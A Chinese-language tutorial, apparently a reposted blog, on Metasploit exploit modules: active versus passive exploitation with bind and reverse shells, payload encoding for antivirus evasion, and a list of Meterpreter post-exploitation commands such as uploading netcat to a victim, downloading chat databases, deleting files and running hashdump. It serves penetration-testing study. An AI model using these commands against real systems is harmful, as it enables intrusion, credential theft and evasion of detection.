Metasploit——渗透攻击模块(Exploit)

Metasploit常用命令、技术功能模块 

Metasploit——辅助模块(Auxiliary) 

目录

1.Exploit模块

2.生成Payload 

3.Meterpreter常用命令

4.弱点扫描


 1.Exploit模块

Active exploits主动:攻击者主动向目标发起漏洞利用代码,触发漏洞

            目标开放一个端口(服务),允许外界计算机连接这个端口(访问这个服务),通常被称为

            某种服务器(比如开放80,http,称为web服务器;开放21,ftp,称为ftp服务器)。

             A发送某种类型的漏洞利用代码给B,这个漏洞利用代码利用之后,加载payload,在B

            上执行payload之后,有两种情况:

             1.在B上再打开一个payload开放的shell侦听端口

             2.B不开放端口,它会反向连接A的一个端口

Metasploit——渗透攻击模块(Exploit)_第1张图片

Passive exploits被动:在这种情况下,B是不会开放端口的,即使开放了端口也是不存在漏洞

        的,它的漏洞存在于本机的一些客户端软件(比如浏览器、PDF阅读器、Java的客户端程

        序),不会侦听一个端口,也不会提供一个服务。

        既然是客户端,他就要去访问一个某些服务器上的一些服务,当它访问的时候,如果服

        务器端上放置了一个漏洞利用代码的话,由于客户程序存在漏洞,当使用存在漏洞的客

        户端程序访问了一些存在了exploits漏洞利用代码的服务器端程序,也会导致服务器端

        exploits漏洞利用的代码,由于B请求A,就作为A的响应报文把漏洞利用代码内容返回给

        B,造成客户端程序漏洞被利用,然后payload加载,

        1.本地绑定一个侦听端口,等攻击者连接;

        2.本地不侦听端口,反弹连接给A侦听的另外一个端口,连接后,B就把shell给A

注:攻击者诱使你用存在漏洞的客户端程序,访问存在漏洞利用代码的服务端程序(恶意伪造

        的站点),把漏洞利用代码从恶意服务器端下载到本地,执行,导致本地客户端程序被利

        用,导致payload加载,出现反弹的shell或直连的shell。

 Metasploit——渗透攻击模块(Exploit)_第2张图片

判断主动还是被动,是看漏洞利用代码,是主动发过去的,还是被动等待客户端连接服务器端而造成客户端漏洞被利用

实验:关闭目标win7的防火墙,主动发起漏洞利用代码,可以拿到shell

Metasploit——渗透攻击模块(Exploit)_第3张图片

实验:开启目标win xp sp2的防火墙,无法主动连接目标了,所以利用被动连接方式

            需要创建一个存在exploits漏洞利用代码的站点(网站),诱使客户端来连接这个网站。

            利用了xp sp2上浏览器的漏洞

Metasploit——渗透攻击模块(Exploit)_第4张图片

2.生成Payload 

绕过坏字符,就是将其编码,一定程度上起到混淆,免杀的效果

search encoders搜索有哪些编码

Metasploit——渗透攻击模块(Exploit)_第5张图片

 Metasploit——渗透攻击模块(Exploit)_第6张图片

 -b排除坏字符,-t输出文件格式,-e指定encoder,-i使用5轮,-k线程,-x模板,-f输出文件

Metasploit——渗透攻击模块(Exploit)_第7张图片

示例:generate -t c -s 30

           generate -t python -s 30

3.Meterpreter常用命令

  • 高级、动态、可扩展的Payload

        基于meterpreter上下文利用更多漏洞发起攻击

        后渗透测试阶段一站式操作界面

  • 完全基于内存的DLL注入时payload(不写硬盘)

        注入到合法系统进程并建立stager

        基于Stager上传和预加载DLL进行扩展模块注入(客户端API)

        基于Stager建立的socket连接建立加密的TLS/1.0通信隧道

        利用TLS隧道进一步加载后续扩展模块(避免网络取证)

  • 服务端使用C语言编写
  • 客户端提供基于Ruby的全特效API(支持任何语言)

Metasploit——渗透攻击模块(Exploit)_第8张图片 Metasploit——渗透攻击模块(Exploit)_第9张图片

help # 查看Meterpreter帮助
background #返回,把meterpreter后台挂起
bgkill # 杀死一个背景 meterpreter 脚本
bglist #提供所有正在运行的后台脚本的列表
bgrun #作为一个后台线程运行脚本
channel #显示活动频道
sessions -i number #与会话进行交互,number表示第n个session,使用session -i 连接到指定序号的meterpreter #会话已继续利用
sesssions -k  number #与会话进行交互
close #关闭通道
exit #终止 meterpreter 会话
quit #终止 meterpreter 会话
interact id #切换进一个信道
run #执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有
    #autoroute,hashdump,arp_scanner,multi_meter_inject等
irb #进入 Ruby 脚本模式
read #从通道读取数据
write #将数据写入到一个通道
run和bgrun #前台和后台执行以后它选定的 meterpreter 脚本
use #加载 meterpreter 的扩展
load/use #加载模块
Resource #执行一个已有的rc脚本
-----------------------------------------------------------------------
文件系统命令
cat c:\boot.ini #查看文件内容,文件必须存在
del c:\boot.ini #删除指定的文件
upload /root/Desktop/netcat.exe c:\ # 上传文件到目标机主上,如upload  setup.exe C:\\windows\\system32\
download nimeia.txt /root/Desktop/   # 下载文件到本机上如:download C:\\boot.ini /root/或者download C:\\"ProgramFiles"\\Tencent\\QQ\\Users\\295******125\\Msg2.0.db /root/
edit c:\boot.ini  # 编辑文件
getlwd #打印本地目录
getwd #打印工作目录
lcd #更改本地目录
ls #列出在当前目录中的文件列表
lpwd #打印本地目录
pwd #输出工作目录
cd c:\\ #进入目录文件下
rm file #删除文件
mkdir dier #在受害者系统上的创建目录
rmdir #受害者系统上删除目录
dir #列出目标主机的文件和文件夹信息
mv #修改目标主机上的文件名
search -d d:\\www -f web.config #search 文件,如search  -d c:\\  -f*.doc
meterpreter > search -f autoexec.bat  #搜索文件
meterpreter > search -f sea*.bat c:\\xamp\\
enumdesktops #用户登录数

迁移

 Meterpreter python扩展

Metasploit——渗透攻击模块(Exploit)_第10张图片

4.弱点扫描

 Metasploit——渗透攻击模块(Exploit)_第11张图片

 Metasploit——渗透攻击模块(Exploit)_第12张图片

 Metasploit——渗透攻击模块(Exploit)_第13张图片

 Metasploit——渗透攻击模块(Exploit)_第14张图片

 Metasploit——渗透攻击模块(Exploit)_第15张图片

 Metasploit——渗透攻击模块(Exploit)_第16张图片

你可能感兴趣的:(渗透学习,安全)